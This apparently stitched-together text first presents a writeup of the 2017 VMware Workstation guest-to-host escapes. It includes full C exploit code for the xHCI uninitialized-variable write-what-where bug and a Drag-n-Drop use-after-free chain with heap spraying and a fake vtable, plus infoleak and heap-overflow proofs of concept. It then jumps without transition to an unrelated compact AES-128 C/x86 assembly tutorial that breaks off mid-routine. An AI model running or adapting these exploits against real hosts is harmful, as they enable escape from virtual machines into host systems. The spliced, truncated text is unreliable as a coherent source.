The fundamental points to remember are:

  • It’s a interface guest-host that we can use
  • It exposes complex services and functionalities.
  • Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

  1. Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
  5. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.

AES-128 Block Cipher

Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

4 years later in November 2001, Rijndael by Belgian Cryptographers Vincent Rijmen and Joan Daemen which we now refer to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

AES Parameters

There are three different set of parameters available, with the main difference related to key length. Our implementation will be AES-128 which fits perfectly onto a 32-bit architecture

.

Key Length
(Nk words)
Block Size
(Nb words)
Number of Rounds
(Nr)
AES-128 4 4 10
AES-192 6 4 12
AES-256 8 4 14

Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstantwhich generate round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which makes the code more compact.

Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
    B i,y,c;
    if(x){
      for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
      x=y;F(4)x^=y=(y<<1)|(y>>7);
    }
    return x^99;
}
void E(B *s){
    W i,w,x[8],c=1,*k=(W*)&x[4];
    
    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];
    
    for(;;){
      // 1st part of ExpandRoundKey, AddRoundKey and update state
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
      
      // 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;      
      
      // if round 11, stop else update c
      if(c==108)break;c=M(c);      
      
      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
      
      // if not round 10, MixColumns
      if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register Description Used by
eax Accumulator lods, stos, scas, xlat, mul, div
ebx Base xlat
ecx Count loop, rep (conditional suffixes E/Z and NE/NZ)
edx Data cdq, mul, div
esi Source Index lods, movs, cmps
edi Destination Index stos, movs, scas, cmps
ebp Base Pointer enter, leave
esp Stack Pointer pushad, popad, push, pop, call, enter, leave

Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from memory pointer in SI to AL before incrementing SI by 1. STOSB will store a byte in AL to memory pointer in DI before incrementing DI by 1. MOVSB will move a byte from memory pointer in SI to memory pointer in DI, before adding 1 to both SI and DI. If the same instruction is preceded REP (for repeat) then this also affects the CX register, decreasing by 1.

Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and 16-byte master key which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to swhile EDI will point to x

EAX will hold Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX than other registers. Byte comparisons are only 2 bytes for AL, while 3 for others.

// 2 vs 3 bytes
  /* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
  /* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
  /* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
  /* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */

In addition to this, one operation requires saving EAX in another register, which only requires 1 byte with XCHG. Other registers would require 2 bytes

// 1 vs 2 bytes
  /* 0001 */ "\x92"                 /* xchg edx, eax        */
  /* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be : XOR EAX, EAX; INC EAX

// 7 bytes
  /* 0001 */ "\x6a\x01"             /* push 0x1             */
  /* 0003 */ "\x58"                 /* pop eax              */
  /* 0004 */ "\x6a\x04"             /* push 0x4             */
  /* 0006 */ "\x59"                 /* pop ecx              */
  /* 0007 */ "\x99"                 /* cdq                  */

Another way …

// 7 bytes
  /* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
  /* 0003 */ "\xf7\xe1"             /* mul ecx              */
  /* 0005 */ "\x40"                 /* inc eax              */
  /* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */

And another..

// 7 bytes
  /* 0000 */ "\x6a\x01"             /* push 0x1             */
  /* 0002 */ "\x58"                 /* pop eax              */
  /* 0003 */ "\x99"                 /* cdq                  */
  /* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32-bytes of stack space, and PUSHAD which saves 8 general purpose registers on the stack is exactly 32-bytes of memory, executed in 1 byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

// 5 bytes
  /* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
  /* 0004 */ "\xc9"             /* leave           */
  
// 6 bytes
  /* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
  /* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */
  
// 2 bytes
  /* 0000 */ "\x60"             /* pushad          */
  /* 0001 */ "\x61"             /* popad           */

Obviously the 2-byte example is better here, but once you require more than 96-bytes, usually ADD/SUB in combination with a register is the better option.

; *****************************
; void E(void *s);
; *****************************
_E:
    pushad
    xor    ecx, ecx           ; ecx = 0
    mul    ecx                ; eax = 0, edx = 0
    inc    eax                ; c = 1
    mov    cl, 4
    pushad                    ; alloca(32)
; F(8)x[i]=((W*)s)[i];
    mov    esi, [esp+64+4]    ; esi = s
    mov    edi, esp
    pushad
    add    ecx, ecx           ; copy state + master key to stack
    rep    movsd
    popad

Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

  1. EBP has no 8-bit registers, so we can’t use it for any 8-bit operations.
  2. Indirect memory access requires 1 byte more for index zero.
  3. The only instructions that use EBP are ENTER and LEAVE.
// 2 vs 3 bytes for indirect access  
  /* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
  /* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

; *****************************
; Multiplication over GF(2**8)
; *****************************
    call   $+21               ; save address      
    push   ecx                ; save ecx
    mov    cl, 4              ; 4 bytes
    add    al, al             ; al <<= 1
    jnc    $+4                ;
    xor    al, 27             ;
    ror    eax, 8             ; rotate for next byte
    loop   $-9                ; 
    pop    ecx                ; restore ecx
    ret
    pop    ebp

SubByte

In the SubBytes step, each byte a_{i,j} in the state matrix is replaced with S(a_{i,j}) using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over GF(2^8), and we can implement SubByte purely using code.

; *****************************
; B SubByte(B x)
; *****************************
sub_byte:  
    pushad 
    test   al, al            ; if(x){
    jz     sb_l6
    xchg   eax, edx
    mov    cl, -1            ; i=255 
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
    mov    al, 1             ; y=1
sb_l1:
    test   ah, ah            ; !c
    jnz    sb_l2    
    cmp    al, dl            ; y!=x
    setz   ah
    jz     sb_l0
sb_l2:
    mov    dh, al            ; y^=M(y)
    call   ebp               ;
    xor    al, dh
    loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
    mov    dl, al            ; dl=y
    mov    cl, 4             ; i=4  
sb_l5:
    rol    dl, 1             ; y=R(y,1)
    xor    al, dl            ; x^=y
    loop   sb_l5             ; i--
sb_l6:
    xor    al, 99            ; return x^99
    mov    [esp+28], al
    popad
    ret

AddRoundKey

The state matrix is combined with a subkey using the bitwise XOR operation. This step known as Key Whitening was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

; *****************************
; AddRoundKey
; *****************************
; F(4)s[i]=x[i]^k[i];
    pushad
    xchg   esi, edi           ; swap x and s
xor_key:
    lodsd                     ; eax = x[i]
    xor    eax, [edi+16]      ; eax ^= k[i]
    stosd                     ; s[i] = eax
    loop   xor_key
    popad

AddRoundConstant

There are various cryptographic attacks possible against AES without this small, but important step. It protects against the Slide Attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants to generate round keys, all the round keys will be the same.

; *****************************
; AddRoundConstant
; *****************************
; *k^=c; c=M(c);
    xor    [esi+16], al
    call   ebp

ExpandRoundKey

The operation to expand the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, these round keys are precomputed before the encryption process since you would only waste CPU cycles repeating the same computation which is unnecessary.

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
    pushad
    add    esi,16
    mov    eax, [esi+3*4]    ; w=k[3]
    ror    eax, 8            ; w=R(w,8)
exp_l1:
    call   S                 ; w=S(w)
    ror    eax, 8            ; w=R(w,8);
    loop   exp_l1
    mov    cl, 4
exp_l2:
    xor    [esi], eax        ; k[i]^=w
    lodsd                    ; w=k[i]
    loop   exp_l2
    popad

Combining the steps

An earlier version of the code used separate AddRoundKeyAddRoundConstant, and ExpandRoundKey, but since these steps all relate to using and updating the round key, the 3 steps are combined in order to reduce the number of loops, thus shaving off a few bytes.

; *****************************
; AddRoundKey, AddRoundConstant, ExpandRoundKey
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
    pushad
    xchg   eax, edx
    xchg   esi, edi
    mov    eax, [esi+16+12]  ; w=R(k[3],8);
    ror    eax, 8
xor_key:
    mov    ebx, [esi+16]     ; t=k[i];
    xor    [esi], ebx        ; x[i]^=t;
    movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
    call   sub_byte          ; al=S(al);
    ror    eax, 8            ; w=R(w,8);
    loop   xor_key
; w=R(w,8)^c;
    xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
    mov    cl, 4
exp_key:
    xor    [esi], eax        ; k[i]^=w;
    lodsd                    ; w=k[i];
    loop   exp_key
    popad

Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because it doesn’t matter about the order of SubBytes and ShiftRows, they’re combined in one loop.

; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
    pushad
    mov    cl, 16
shift_rows:
    lodsb                    ; al = S(s[i])
    call   sub_byte
    push   edx
    mov    ebx, edx          ; ebx = i%4
    and    ebx, 3            ;
    shr    edx, 2            ; (i/4 - ebx) % 4
    sub    edx, ebx          ; 
    and    edx, 3            ; 
    lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
    mov    [edi+ebx], al     ; x[ebx] = al
    pop    edx
    inc    edx
    loop   shift_rows
    popad

Mixing Columns

The MixColumns transformation along with ShiftRows are the main source of diffusion. Each column is treated as a four-term polynomial b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}, where the coefficients are elements over {GF} (2^{8}), and is then multiplied modulo x^{4}+1 with a fixed polynomial a(x)=3x^{3}+x^{2}+x+2

; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    pushad
mix_cols:
    mov    eax, [edi]        ; w0 = x[i];
    mov    ebx, eax          ; w1 = w0;
    ror    eax, 8            ; w0 = R(w0,8);
